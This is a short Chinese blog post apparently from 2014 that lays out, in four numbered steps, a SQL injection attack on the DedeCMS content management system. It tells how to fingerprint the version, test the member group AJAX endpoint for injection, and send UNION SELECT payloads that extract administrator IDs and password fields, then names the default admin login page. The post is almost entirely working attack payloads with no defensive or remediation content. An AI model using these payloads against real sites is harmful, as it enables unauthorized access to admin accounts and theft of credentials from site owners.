一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)
二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入
三、爆用户:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id
四、爆密码的字段:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`
默认后台:dede/login.php

posted on 2014-03-30 20:25  milantgh  阅读(1877)  评论(0编辑  收藏  举报